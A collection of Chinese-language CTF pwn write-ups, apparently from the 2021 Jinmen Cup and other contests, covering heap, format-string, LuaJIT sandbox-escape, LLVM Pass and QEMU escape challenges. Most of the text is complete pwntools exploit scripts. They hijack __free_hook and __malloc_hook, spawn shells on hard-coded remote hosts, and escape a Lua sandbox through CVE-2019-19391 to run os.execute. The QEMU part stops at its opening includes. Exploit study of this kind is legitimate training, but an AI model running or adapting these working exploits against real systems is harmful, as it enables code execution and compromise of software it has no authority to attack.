house of big

打出了个非预期,找到了一条奇怪的IO_FILE函数利用链——io_wfile_sync,该利用链需要配合一个手动挖出来的libc2.31的one_gadget使用。可迁移性不强(其实所有利用IO_FILE vtable指针的打法都大同小异

三个角色的哈希校验绕过

A: b'AV;\x8b\x02'

B: b'B\xbf\x1b\x1e\x04'

C: b'C%:U\x01'

哈希爆破脚本

from hashlib import md5

i = 2**24 # skip "\x00"

while True:
    #d = b"A"
    #d = b"B"
    d = b"C"
    _input = d + i.to_bytes(4, "little")
    #print(_input)
    tmp = md5(_input).digest()
    if tmp[:3] == b"<D\x00" and b"\x00" not in _input:
        print(i, d + i.to_bytes(4, "little"))
        break
    i += 1

exp:

from pwn import *
import hashlib

#p = process("./pig_patch", env={"LD_PRELOAD":"./libc-2.31.so"})
p = remote("172.35.6.13", 8888)
elf = ELF("./pig")
libc = ELF("./libc-2.31.so")
context.log_level = "debug"

# b'AV;\x8b\x02'
# b'B\xbf\x1b\x1e\x04'
# b'C%:U\x01'

def load_peppa():
    p.sendlineafter(b"Choice: ", b"5")
    p.sendlineafter(b"Please enter the identity password of the corresponding user:\n", b'AV;\x8b\x02')
    
def load_mummy():
    p.sendlineafter(b"Choice: ", b"5")
    p.sendlineafter(b"Please enter the identity password of the corresponding user:\n", b'B\xbf\x1b\x1e\x04')
    
def load_daddy():
    p.sendlineafter(b"Choice: ", b"5")
    p.sendlineafter(b"Please enter the identity password of the corresponding user:\n", b'C%:U\x01')
    
    
def add_peppa_msg(size:int, msg):
    p.sendlineafter(b"Choice: ", b"1")
    p.sendlineafter(b"Input the message size: ", str(size).encode())
    p.recvuntil(b"Input the Peppa's message: ")
    p.send(msg)
    
def add_mummy_msg(size:int, msg):
    p.sendlineafter(b"Choice: ", b"1")
    p.sendlineafter(b"Input the message size: ", str(size).encode())
    p.recvuntil(b"Input the Mummy's message: ")
    p.send(msg)
    
def add_daddy_msg(size:int, msg):
    p.sendlineafter(b"Choice: ", b"1")
    p.sendlineafter(b"Input the message size: ", str(size).encode())
    p.recvuntil(b"Input the Daddy's message: ")
    p.send(msg)
    
def show_msg(idx:int):
    p.sendlineafter(b"Choice: ", b"2")
    p.sendlineafter(b"Input the message index: ", str(idx).encode())
    
def edit_peppa_msg(idx:int, msg):
    p.sendlineafter(b"Choice: ", b"3")
    p.sendlineafter(b"Input the message index: ", str(idx).encode())
    p.sendafter(b"Input the Peppa's message: ", msg)
    
def edit_mummy_msg(idx:int, msg):
    p.sendlineafter(b"Choice: ", b"3")
    p.sendlineafter(b"Input the message index: ", str(idx).encode())
    p.sendafter(b"Input the Mummy's message: ", msg)
    
def edit_daddy_msg(idx:int, msg):
    p.sendlineafter(b"Choice: ", b"3")
    p.sendlineafter(b"Input the message index: ", str(idx).encode())
    p.sendafter(b"Input the Daddy's message: ", msg)
    
def del_msg(idx:int):
    p.sendlineafter(b"Choice: ", b"4")
    p.sendlineafter(b"Input the message index: ", str(idx).encode())

def exp():    
    #load_mummy()
    # leak addr
    #gdb.attach(p, "handle SIGALRM noignore\nb _IO_wfile_sync\nc\n")
    
    for i in range(8):
        add_peppa_msg(0x150, b"a"*((0x150//0x30) * 0x10)) #peppa 0-7
    add_peppa_msg(0x150, b"split\n"*(0x150//0x30)) #peppa 8
    for i in range(8):
        del_msg(i)
    load_mummy()
    load_peppa()
    show_msg(7) # leak libc
    p.recvuntil(b"The message is: ")
    libc_leak = u64(p.recvuntil(b"\n", drop=True).ljust(8, b"\x00"))
    libc_base = libc_leak - 0x1ebbe0
    global_max_fast = libc_base + 0x1eeb80
    system = libc_base + libc.symbols[b"system"]
    binsh = libc_base + next(libc.search(b"/bin/sh"))
    free_hook = libc_base + libc.symbols[b"__free_hook"]
    io_list_all = libc_base + 0x1ec5a0
    print("libc_leak:", hex(libc_leak))
    print("libc_base:", hex(libc_base))
    print("system:", hex(system))
    print("global_max_fast:", hex(global_max_fast))
    show_msg(6) # leak heap
    p.recvuntil(b"The message is: ")
    heap_leak = u64(p.recvuntil(b"\n", drop=True).ljust(8, b"\x00"))
    heap_base = heap_leak - 0x12590
    print("heap_leak:", hex(heap_leak))
    print("heap_base:", hex(heap_base))
    
    # largebin attack
    #edit_peppa_msg(7, ((p64(global_max_fast)+p64(global_max_fast-0x10)) * (0xa0//0x30))) # modify smallbin
    #add_peppa_msg(0xa0, b"a"*((0xa0//0x30) * 0x10)) #peppa 9 trigger unsortedbin
    #gdb.attach(p)
    #pause()
    load_mummy()
    add_mummy_msg(0x150, b"a"*((0x150//0x30) * 0x10)) #mummy 0
    add_mummy_msg(0x410, b"a"*((0x410//0x30) * 0x10)) #mummy 1
    load_peppa()
    add_peppa_msg(0x150, b"a"*((0x150//0x30) * 0x10)) #peppa 9
    load_mummy()
    add_mummy_msg(0x420, b"a"*((0x420//0x30) * 0x10)) #mummy 2
    load_peppa()
    add_peppa_msg(0x150, b"a"*((0x150//0x30) * 0x10)) #peppa 10
    load_mummy()
    del_msg(2)
    
    ## reuse
    load_daddy()
    add_daddy_msg(0x150, b"x"*((0x150//0x30) * 0x10)) #daddy 0
    del_msg(0)
    #gdb.attach(p)
    #pause()
    load_peppa()
    add_peppa_msg(0x150, b"x"*((0x150//0x30) * 0x10)) #peppa 11
    del_msg(11) 
    #gdb.attach(p)
    #pause()
    
    load_mummy()
    add_mummy_msg(0x430, b"a"*((0x430//0x30) * 0x10)) #mummy 3
    del_msg(1)
    load_peppa() # refresh locked_flag
    load_mummy()
    #gdb.attach(p)
    #pause()
    edit_mummy_msg(2, (p64(heap_base+0x12cc0)+p64(io_list_all-0x20)) * (0x420//0x30)) # telescop 0x5555555704e0
    load_daddy()
    
    ## trigger
    add_daddy_msg(0x150, b"x"*((0x150//0x30) * 0x10)) #daddy 1
    print("global_max_fast:", hex(global_max_fast))
    print("io_list_all:", hex(io_list_all))
    target_chunk = heap_base + 0x13080
    print("target_chunk:", hex(target_chunk))
    #gdb.attach(p)
    #pause()

    
    io_str_jumps = libc_base + 0x1ed0e0
    ptr_2_io_wfile_sync = libc_base + 0x1ece40
    io_wfile_jumps = libc_base + 0x1ecde0
    #io_str_jumps = libc_base + 0x1ed320
    print("io_str_jumps:", hex(io_str_jumps))
    print("io_wfile_jumps:", hex(io_wfile_jumps))
    
    
    ## write fake io_file
    
    '''
    # old payload
    payload = p64(0)*2
    payload += p64(0) + p64((binsh-100)//2 +1) #_IO_write_base _IO_write_ptr
    payload += p64(0)*2
    payload += p64((binsh -100)//2) # _IO_buf_end;
    payload += p64(0)*4
    payload += p64(0) # _chain
    payload = payload.ljust((0x88-0x10), b"\x00")
    payload += p64(free_hook) # ptr to 0 for _lock
    payload = payload.ljust((0xa8-0x10), b"\x00")
    payload += p64(2) + p64(3) # _freeres_list _freeres_buf
    payload = payload.ljust((0xc0-0x10), b"\x00")
    payload += p32(0xffffffff)
    payload = payload.ljust((0xd8-0x10), b"\x00")
    payload += p64(io_str_jumps) + p64(system)
    payload = payload.ljust(0xf0, b"\x00")
    '''
    
    one_gadget = libc_base+0xE6C80
    payload = p64(0)*4
    payload += p64(one_gadget) + p64(one_gadget+1) #write_base write_ptr
    payload = payload.ljust(0x88, b"\x00")
    payload += p64(free_hook)
    payload = payload.ljust(0x98, b"\x00")
    payload += p64(target_chunk+0x110) + p64(target_chunk+0xe0) # _codecvt  _wide_data
    payload = payload.ljust(0xd8, b"\x00") + p64(io_wfile_jumps+8*9)
    payload += p64(1)+p64(0)*2+p64(1)+p64(0)*2
    #payload += b"/bin/sh\x00"+p64(0)*1+p64(system)
    payload += p64(target_chunk)+p64(0)*1+p64(system)
    payload = payload[0x10:].ljust(0x150, b"\x00")
    
    part1 = b""
    part2 = b""
    part3 = b""
    
    
    for i in range(7):
        part1 += payload[0x30*i : 0x30*i+0x10]
        part2 += payload[0x30*i+0x10 : 0x30*i+0x20]
        part3 += payload[0x30*i+0x20 : 0x30*i+0x30]
        
    load_peppa()
    edit_peppa_msg(11, part1)
    load_mummy()
    edit_mummy_msg(2, part2+(p64(0)*2)*(0x420//0x30-7))
    load_daddy()
    edit_daddy_msg(0, part3)
    
    print("io_list_all:", hex(io_list_all))
    print("io_str_jumps:", hex(io_str_jumps))
    print("ptr_2_io_wfile_sync:", hex(ptr_2_io_wfile_sync))
    print("io_wfile_jumps:", hex(io_wfile_jumps))
    
    ## trigger system

    #gdb.attach(p, "set *(unsigned long long *)0x7fffffffe938=0x7ffff7e6b290\nb *0x7ffff7e6b290\nc\n")
    # set *(unsigned long long *)0x7fffffffe938=0x7ffff7e6b290
    # b *0x7ffff7e6b290
    load_mummy()
    del_msg(0)  
    print("onegadget:", hex(one_gadget))
    # _IO_flush_all_lockp
    # 0x7ffff7e62984
    # 0x7ffff7e62981
    #gdb.attach(p)
    #pause()
    
    p.interactive()
    

if __name__ == "__main__":
    exp()

hardstack

hand burp

from pwn import *
import sys

libc = ELF("./libc-2.27.so")
context.log_level = "debug"

def new(idx:int, size:int):
    p.sendlineafter(b"Your choice: ", b"1")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
    
def edit(idx:int, content):
    p.sendlineafter(b"Your choice: ", b"2")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendafter(b"Content: ", content)
    
def delete(idx:int):
    p.sendlineafter(b"Your choice: ", b"4")
    p.sendlineafter(b"Index: ", str(idx).encode())
    
def stkof(length, payload):
    p.sendlineafter(b"Your choice: ", b"666")
    p.sendline(str(length))
    p.send(payload)
    
def exp():
    global p
    
    #p = process("./hardstack_patch", env={"LD_PRELOAD":"./libc-2.27.so"})
    p = remote("172.35.6.14", 9999)
    #p.settimeout(1)
    
    #gdb.attach(p, "b *0x400C4C\nc\n") #stkof
    #chunk_list: 0x6020D0
    #stdout: 0x00007ffff7dce760
    #leak: 0x00007ffff7dce090
    
    # attack IO_FILE
    ## prepare
    new(0xf, 0xda0)
    new(0, 0x1) #0
    new(1, 0x1) #1
    new(2, 0x28) #2
    new(3, 0x28) #3
    new(4, 0x28) #4
    new(5, 0x410) #5
    new(6, 0x10) #6 split
    delete(5)
    new(7, 0x2) #6->4
    
    ## build
    delete(0)
    delete(1)
    delete(2)
    delete(3)
    delete(4)
    edit(1, b"\xb0")
    
    new(8, 0x1)
    new(9, 0x1)
    edit(9, b"\xe0")
    edit(7, b"\x30\xdc")
    
    ## get
    new(10, 0x20)
    new(11, 0x20)
    new(12, 0x20)

    edit(12, p64(0x400b20)+p64(0)*3)
    edit(12, p64(0x400a20)+p64(0)*3)

    
    # leak
    new(13, str(0x601FD0))
    malloc = u64(p.recvuntil(b"\x0a", drop=True).ljust(8, b"\x00"))
    libc_base = malloc - 0x97140
    binsh = libc_base + next(libc.search(b"/bin/sh"))
    system = libc_base + libc.symbols[b"system"]
    gets = libc_base + libc.symbols[b"gets"]
    print("malloc:", hex(malloc))
    print("libc:", hex(libc_base))
    print("binsh:", hex(binsh))
    print("system:", hex(system))
    #new(13, str(0x601FD0))
    edit(12, p64(gets)+p64(0)*3)
    new(14, 0x6020d0)
    p.sendline(b"/bin/sh\x00"+p64(0)*3)
    #gdb.attach(p, "b *0x400b4b")
    edit(12, p64(system)+p64(0)*3)
    new(1, 0x6020d0)

    p.sendline(b"cat flag; cat flag;")
    p.interactive()
    

if __name__ == "__main__":
    while True:
        exp()

lua

套了一个sandbox

LuaJIT版本2.1.0-beta3 2017

复现CVE-2019-19391: https://github.com/LuaJIT/LuaJIT/pull/526

原POC还差写地址的部分

Type confusion 偏移到os.execute来bypass sandbox

exp:

local str = "123456789"
-- local bit = require("bit")
local bit_band   = bit.band
local bit_lshift = bit.lshift
local bit_rshift = bit.rshift
local math_floor = math.floor
local math_frexp = math.frexp
local math_ldexp = math.ldexp
local math_huge  = math.huge
function UInt32sToDouble(low, high)
    local negative = false
    
    if high >= 0x80000000 then
        negative = true
        high = high - 0x80000000
    end
    
    local biasedExponent = bit_rshift(bit_band(high, 0x7FF00000), 20)
    local mantissa = (bit_band(high, 0x000FFFFF) * 4294967296 + low) / 2 ^ 52
    
    local f
    if biasedExponent == 0x0000 then
        f = mantissa == 0 and 0 or math_ldexp(mantissa, -1022)
    elseif biasedExponent == 0x07FF then
        f = mantissa == 0 and math_huge or(math_huge - math_huge)
    else
        f = math_ldexp(1 + mantissa, biasedExponent - 1023)
    end
    
    return negative and -f or f
end
local obj_address = tonumber(string.format( "%p", str ), 16) + 12
print(string.format( "%p", str ))
address = UInt32sToDouble( obj_address, 0 )
local func = debug.getinfo( 0, ">f", address ).func
print(func)
-- This is supposed to get the environment of the function
-- but it allows us to read memory by formatting the address
-- into a pointer
local length = debug.getfenv( func )
-- Format the address into a pointer
-- prints 4, the length of the string
-- print(string.format( "%p", length))
print("read memory:")
-- print( tonumber( string.format( "%p", length), 16 ) ) 
print(string.format( "%p", length)) 
function read_mem(mem_addr)
    mem_addr = mem_addr - 8
    address = UInt32sToDouble( mem_addr, 0 )
    local func = debug.getinfo( 0, ">f", address ).func
    local length = debug.getfenv( func )
    return string.format( "%p", length)
end 
function exec_addr(e_addr, fake_argv)
    -- e_addr = e_addr - 8 
    address = UInt32sToDouble( e_addr, 0 )
    local func = debug.getinfo( 0, ">f", address ).func
    func(fake_argv)
    print("exec successfully!!!")
end 
-- print(read_mem(obj_address - 4 - 0x10 + 4 ))
function addr_of(fake_obj)
    -- local o_address = tonumber(string.format("%p", fake_obj), 16)
    local o_address = string.format("%p", fake_obj)
    return o_address
end
function todo()
    print("hi,happy.")
end
print("addr of ipairs")
func_addr_of_ipairs = addr_of(ipairs)
print(ipairs)
print("addr of:")
func_addr_of_exec_addr = addr_of(exec_addr)
print(func_addr_of_exec_addr)
print("delta:")
print(string.format("0x%x", func_addr_of_exec_addr - func_addr_of_ipairs))
-- print(string.format("0x%x", func_addr_of_real_os_execute -func_addr_of_ipairs ))
-- func_addr_of_real_os_execute -func_addr_of_ipairs = 0x2540
-- print(string.format("0x%x", func_addr_of_load - func_addr_of_ipairs))
-- func_addr_of_load - func_addr_of_ipairs = 0x4b8
-- print(string.format("0x%x", func_addr_of_exec_addr - func_addr_of_load))
print("content:")
print(read_mem(func_addr_of_exec_addr))
-- exec_addr(obj_address)
function Sleep(n)
    local t0 = os.clock()
    while os.clock() - t0 <= n do end
 end
-- Sleep(20)
function faking_func() 
    print("fake me!!!")
end
local fake_args = function() print("exe_me!") end
-- load(fake_args)
-- exec_addr
-- exec_addr(addr_of(faking_func) , nil)
-- calc_load_addr = func_addr_of_ipairs + 0x4b8
calc_exec_addr = func_addr_of_ipairs + 0x2540
exec_addr(calc_exec_addr, "cat flag")

这是津门杯 2021的一个pwn

题目很明显的off-by-null,第一思路肯定是:构造unlink->overlap->leak->tcache_attack。

但是由于是strcpy向堆内存中复制,所以不能同时构造prev_sizesize域。首先很自然的想到了循环递减字符的方法清空prev_size,然后写入需要的值。但是想错了一个地方,我以为所有堆块在释放前都要被检查inuse(p),这样使得循环递减的方法无法使用(因为这需要先溢出覆盖好sizenot inuse标志)。但是查阅源码后发现,如果不定义MALLOC_DEBUG的话,是不会有这个检查的,所以是我多虑了。

整理思路之后确定:用两个unsorted chunk夹住一个unsorted chunk和一个tcache chunk,unlink构造overlap之后用被夹住的unsorted chunk泄露地址,用tcache chunktcache attack__free_hook

吸取经验,ptmalloc各个流程的检查还是要明晰一下的。

exp on Ubuntu16.04

from pwn import *

p = process("./pwn")
#p = remote("119.3.81.43", 49155)
elf = ELF("./pwn")
libc = ELF("./libc.so.6")
context.log_level = "debug"

# your choice>>
# list: 0x0000555555554000+0x203040

def add(name, size:int, des, score:int, finished=True):
    p.sendlineafter(b"your choice>>", b"1")
    p.sendafter(b"topic name:", name)
    p.sendlineafter(b"des size:", str(size).encode())
    p.sendafter(b"topic des:", des)
    if finished:
        p.sendlineafter(b"topic score:", str(score).encode())

def delete(idx:int):
    p.sendlineafter(b"your choice>>", b"2")
    p.sendlineafter(b"index:", str(idx).encode())

def show(idx:int):
    p.sendlineafter(b"your choice>>", b"3")
    p.sendlineafter(b"index:", str(idx).encode())

def exp():
    p.sendlineafter(b"input manager name:", b"CTFM")
    p.sendlineafter(b"input password:", b"123456")
    #gdb.attach(p, "b *0x0000555555554000+0xe08\nc\n")

    # build overlapping

    add(b"AAAA", 0x90, b"unsorted", 100) #0
    add(b"AAAA", 0x68, b"vuln", 100) #1
    add(b"AAAA", 0x68, b"vuln", 100) #2
    add(b"AAAA", 0xf0, b"AAAA", 100) #3
    add(b"split", 0x10, b"split", 100) #4
    #delete(0) into unsorted bin

    delete(2)
    add(b"AAAA", 0x68, b"a"*0x68, 100) #2
    for i in range(7, -1, -1):
        delete(2)
        add(b"AAAA", 0x68, b"a"*(0x60+i), 100) #2
    delete(2)
    add(b"AAAA", 0x68, b"a"*0x60 + p64(0x180), 100) #2
    delete(0)
    delete(3) # unlink

    # leak libc
    add(b"BBBB", 0x90, b"BBBB", 100) #0
    #add(b"BBBB", 0x68, b"BBBB", 100) #0
    gdb.attach(p)
    show(1)
    p.recvuntil(b"topic des:")
    libc_leak = u64(p.recv(6).ljust(8, b"\x00"))
    libc_base = libc_leak - 88 - 0x10 - libc.symbols[b"__malloc_hook"]
    malloc_hook = libc_base + libc.symbols[b"__malloc_hook"]
    fake_chunk = malloc_hook - 0x23
    one_gadget = libc_base + 0x4527a
    print("libc_leak:", hex(libc_leak))
    print("libc_base:", hex(libc_base))
    print("malloc_hook:", hex(malloc_hook))
    print("one_gadget:", hex(one_gadget))

    # fastbin attack
    add(b"BBBB", 0x68, b"BBBB", 100) #3
    add(b"BBBB", 0x68, b"BBBB", 100) #5
    delete(1)
    delete(5)
    delete(3)

    add(b"tmp", 0x68, p64(fake_chunk), 100) #6
    add(b"tmp", 0x68, "tmp", 100) #7
    add(b"tmp", 0x68, "tmp", 100) #8
    add(b"tmp", 0x68, b"a"*0x13 + p64(one_gadget), 100) #9
    print("malloc_hook:", hex(malloc_hook))

    # getshell
    delete(2)
    add(b"tmp", 0x68, "tmp", 100, False) #2


    #gdb.attach(p)
    p.interactive()

if __name__ == "__main__":
    exp()

exp on ubuntu18.04

from pwn import *

#p = process("./pwn")
p = remote("119.3.81.43", 49155)
elf = ELF("./pwn")
libc = ELF("./libc.so.6")
context.log_level = "debug"

# your choice>>
# list: 0x0000555555554000+0x203040

def add(name, size:int, des, score:int, finished=True):
    p.sendlineafter(b"your choice>>", b"1")
    p.sendafter(b"topic name:", name)
    p.sendlineafter(b"des size:", str(size).encode())
    p.sendafter(b"topic des:", des)
    if finished:
        p.sendlineafter(b"topic score:", str(score).encode())

def delete(idx:int):
    p.sendlineafter(b"your choice>>", b"2")
    p.sendlineafter(b"index:", str(idx).encode())

def show(idx:int):
    p.sendlineafter(b"your choice>>", b"3")
    p.sendlineafter(b"index:", str(idx).encode())

def exp():
    p.sendlineafter(b"input manager name:", b"CTFM")
    p.sendlineafter(b"input password:", b"123456")
    #gdb.attach(p, "b *0x0000555555554000+0xe08\nc\n")

    # build overlapping

    for i in range(7):
        add(b"AAAA", 0xf0, b"unsorted", 100) #0-6
    add(b"AAAA", 0xf0, b"unsorted", 100) #7
    add(b"AAAA", 0x68, b"vuln", 100) #8
    add(b"AAAA", 0xf0, b"unsorted", 100) #9
    for i in range(6):
        delete(i) #del 0-5
    delete(7)
    add(b"split", 0x10, b"split", 100) #0 split
    delete(6) 

    ## offbynull
    delete(8)
    add(b"AAAA", 0x68, b"a"*0x68, 100) #1  
    ## make up prev_size  
    for i in range(8):
        delete(1)
        add(b"AAAA", 0x68, b"a"*(0x68-i), 100) #1
    delete(1)
    add(b"AAAA", 0x68, b"a"*0x60+p64(0x270), 100) #1
    delete(9) #delete 9 unlink
    #gdb.attach(p)

    # leak libc
    add(b"show", 0xf0, b"show", 100) #2
    add(b"BBBB", 0xd0, b"BBBB", 100) #3
    add(b"BBBB", 0x10, b"BBBB", 100) #4
    show(2)
    p.recvuntil(b"topic des:")
    libc_leak = u64(p.recv(6).ljust(8, b"\x00"))
    libc_base = libc_leak - 96 - 0x10 - libc.symbols[b"__malloc_hook"]
    free_hook = libc_base + libc.symbols[b"__free_hook"]
    system = libc_base + libc.symbols[b"system"]
    print("libc_leak:", hex(libc_leak))
    print("libc_base:", hex(libc_base))

    # tcache attck
    add(b"tmp", 0x68, b"tmp", 100) #5
    delete(5)
    delete(1)
    add(b"BBBB", 0x80, b"BBBB", 100) #1
    add(b"BBBB", 0x160, p64(free_hook), 100) #5

    # rewrite freehook
    add(b"CCCC", 0x68, b"/bin/sh\x00", 100) #6
    add(b"CCCC", 0x68, p64(system), 100) #7
    print("free_hook:", hex(free_hook))
    delete(6)

    #gdb.attach(p)
    p.interactive()

if __name__ == "__main__":
    exp()

题目很有意思,学到很多

parser

这题是一个魔改的httpd,Content-Length小于0时存在格式化串漏洞,leak后写one_gadget即可

from pwn import *

#p = process("./chall", env={"LD_PRELOAD":"./libc-2.27.so"})
p = remote("47.105.94.48", 12435)
elf = ELF("./chall")
libc = ELF("./libc-2.27.so")
context.log_level = "debug"

req_base = '''GET / HTTP/1.1
Host: 127.0.0.1
Content-Length: -1

aaaaa'''

req_leak = '''GET / HTTP/1.1
Host: 127.0.0.1
Content-Length: -1

||%8$p||%15$p||%213$p||
'''

def send_req(request):
    p.sendafter(b"> ", request)

def exp():
    # leak stack libc image_base
    send_req(req_leak)
    p.recvuntil(b"||")
    stack_leak = int(p.recvuntil(b"||", drop = True), 16)
    image_leak = int(p.recvuntil(b"||", drop = True), 16)
    libc_leak = int(p.recvuntil(b"||", drop = True), 16)
    libc_base = libc_leak - 0x21b97
    image_base = image_leak - 0x14a8
    one_gadget = libc_base + 0x4f3c2
    system = libc_base + libc.symbols[b"execve"]
    binsh = libc_base + next(libc.search(b"/bin/sh"))
    pop_rdi_ret = image_base + 0x16a3
    pop_rsi_ret = libc_base + 0x23e8a
    pop_rdx_ret = libc_base + 0x1b96
    print("stack_leak:", hex(stack_leak))
    print("image_leak:", hex(image_leak))
    print("libc_leak:", hex(libc_leak))
    print("libc_base:", hex(libc_base))
    print("image_base:", hex(image_base))
    print("system:", hex(system))
    print("binsh:", hex(binsh))

    # attack_ret_addr

    main_ret = 0x5a8 + stack_leak
    print("main_ret:", hex(main_ret))

    for i in range(6):
        payload = req_base.encode()
        payload += ("%{}c".format(((libc_base+0x10a45c >> (8*i) ) & 0xff) -5).encode() + b"%27$hhn").ljust(32, b"A")
        payload += p64(main_ret+i)
        print(len(payload))
        send_req(payload)

    # trigger main_ret->one_gadget
    send_req("11111")

    # ./getflag
    p.interactive()

if __name__ == "__main__":
    exp()

simpleVM

这里的漏洞出在LLVM Pass,LLVM核心库提供了一些"Pass"类让开发者可以去继承然后实现想要的功能。主要的作用就是把编译过程中间的IR喂给自定义的Pass从而进行一些针对性的、机器无关的优化。这题的Pass实现了一个由push pop store load add min组成的虚拟机,由于没有边界限制,且主程序没开PIE保护,所以很容易进行任意地址读写。

README.txt

Hack LLVM!

Docker Guidance:

FROM ubuntu:18.04

RUN sed -i "s/http:\/\/archive.ubuntu.com/http:\/\/mirrors.tuna.tsinghua.edu.cn/g" /etc/apt/sources.list && \
    apt-get update && apt-get -y dist-upgrade && \
    apt-get install -y lib32z1 xinetd libseccomp-dev libseccomp2 seccomp clang-8 opt llvm-8 python

once your exp.bc(bitcode file) is uploaded

Sever will execute `opt-8 -load ./VMPass.so -VMPass ./exp.bc`

exp.c

void push(int a);
void pop(int a);
void store(int a);
void load(int a);
void add(int a, int b);
void min(int a, int b);

void o0o0o0o0(){
    add(1, 0x77e100);
    load(1);
    add(2, 0x72a9c);
    store(1);
}

exp.bc

; ModuleID = 'exp.c'
source_filename = "exp.c"
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"

; Function Attrs: noinline nounwind optnone uwtable
define void @o0o0o0o0() #0 {
  call void @add(i32 1, i32 7856384)
  call void @load(i32 1)
  call void @add(i32 2, i32 469660)
  call void @store(i32 1)
  ret void
}

declare void @add(i32, i32) #1

declare void @load(i32) #1

declare void @store(i32) #1

attributes #0 = { noinline nounwind optnone uwtable "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }
attributes #1 = { "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }

!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 6.0.0-1ubuntu2 (tags/RELEASE_600/final)"}

manager

用二叉树管理内存的堆题,特定条件下删根节点会double free。

伪代码看的我血压升高,直接调确定一种情况比如根节点有左右节点,且右节点有两个叶子。这样free掉根节点时会出现loop chain。慢慢利用就行。

exp

from pwn import *

#p = process("./chall", env={"LD_PRELOAD":"./libc-2.27.so"})
p = remote("47.105.94.48", 12243)
libc = ELF("./libc-2.27.so")
context.arch = "amd64"
context.log_level = "debug"

# header: 0x555555554000+0x202018

def add(key:int, length:int, content):
    p.sendlineafter(b"> ", b"1")
    p.sendlineafter(b"key> ", str(key).encode())
    p.sendlineafter(b"len> ", str(length).encode())
    p.sendafter(b"content> ", content)

def delete(key:int):
    p.sendlineafter(b"> ", b"2")
    p.sendlineafter(b"key> ", str(key).encode())

def show():
    p.sendlineafter(b"> ", b"3")

def exp():
    # leak libc
    add(1, 0x420, b"unsorted")
    add(2, 0x420, b"unsorted2")
    delete(1)
    delete(2)
    add(5, 0x10, b"5"*8)
    show()
    p.recvuntil(b"55555555")
    libc_leak = u64(p.recvuntil(b"\x0a", drop=True).ljust(8, b"\x00"))
    libc_base = libc_leak - 0x3ec090
    system = libc_base + libc.symbols[b"system"]
    free_hook = libc_base + libc.symbols[b"__free_hook"]
    print("libc_leak:", hex(libc_leak))
    print("libc_base:", hex(libc_base))
    print("system:", hex(system))

    # build double free
    add(7, 0x10, b"7"*8)
    add(6, 0x10, b"6"*8)
    add(4, 0x10, b"4"*8)
    add(8, 0x10, b"8"*8)
    delete(8)

    delete(5)
    add(10, 0x10, p64(free_hook))
    add(11, 0x10, b"/bin/sh\x00")
    add(12, 0x10, p64(system))
    print("free_hook:", hex(free_hook))

    delete(11)
    #gdb.attach(p)
    p.interactive()

if __name__ == "__main__":
    exp()

一个QEMU逃逸题,虽然漏洞的逻辑也不复杂,但是此类UAF利用思路可以借鉴一下,还是很有价值的。

转自:http://pzhxbz.cn/?p=166

Easy_Escape is a qemu escape challenge in RealWorld CTF 2021,It implement a deivce named fun and has two operations: fun_mmio_write and fun_mmio_read.The code is simple:

void fun_write(struct FunState *fun,int addr,int val) {
    switch (addr) {
    case 0x0:
        fun->req_total_size = val;
        break;
    case 0x4:
        fun->addr = val;
        break;
    case 0x8:
        fun->result_addr = val;
        break;
    case 0xc:
        fun->FunReq_list_idx = val;
        break;
    case 0x10:
        if (fun->req) {
            handle_data_read(fun, fun->req,fun->FunReq_list_idx);
            break;
        }
        else{
            break;
        }
    case 0x14:
        if (fun->req) {
            break;
        }
        else {
            fun->req = create_req(fun->req_total_size);
            break;  
        }
    case 0x18:
        if (fun->req) {
            delete_req(fun->req);
            fun->req = 0;
            fun->req_total_size = 0;
            break;
        }
        else{
            fun->req = 0;
            fun->req_total_size = 0;
            break;
        }
    }
    return 0;
}
int fun_read(struct FunState *fun, int addr) {
    int ret_data = -1;
    switch (addr) {
    case 0x0:
        ret_data = fun->req_total_size;
        break;
    case 0x4:
        ret_data = fun->addr;
        break;
    case 0x8:
        ret_data = fun->result_addr;
        break;
    case 0xc:
        ret_data = fun->FunReq_list_idx;
        break;
    case 0x10:
        if (fun->req) {
            handle_data_write(fun, fun->req,fun->FunReq_list_idx);
            break;
        }
        else {
            break;
        }
    }
    return ret_data;
}

In fun_mmio_write , we can malloc and free req’s buffer,and write data into it. In fun_read, we can read data from req. In handle_data_read, there is something strange:

void __cdecl put_result(FunState *fun, uint32_t_0 val)
{
  uint32_t_0 result; // [rsp+14h] [rbp-Ch] BYREF
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]
  result = val;
  dma_memory_write_9(fun->as, fun->result_addr, &result, 4uLL);
}
void __cdecl handle_data_read(FunState *fun, FunReq *req, uint32_t_0 val)
{
  if ( req->total_size && val <= 126 && val < (req->total_size >> 10) + 1 )
  {
    put_result(fun, 1u);
    dma_memory_read_9(fun->as, (val << 10) + fun->addr, req->list[val], 0x400uLL);
    put_result(fun, 2u);
  }

put_result can write a data to somewhere, it seems useless. But if put_result write the device’s address + 0x18, it free req before we write, so it can cause a uaf.

After that , it was easy to solve. In my exploit, I leak thread arena and req’s address firstly. But I think my ways to leak req’s address may be unstable.I leaked tcache list first, next I use absolute offset calculate the the fd address to locate the req’s address. If there be more malloc or free operation, my way will get wrong address.

After leak req’s address, we can use uaf to overwrite tcache’s list point to the address which req will be, like this:

then modify the pointer in req can get anywhere write and anywhere read. I leaked the thread anera’s next and get main arena’s address, finally write free_hook to system to get the shell. Here’s the finally exp:

#include <unistd.h>
#include <sys/io.h>
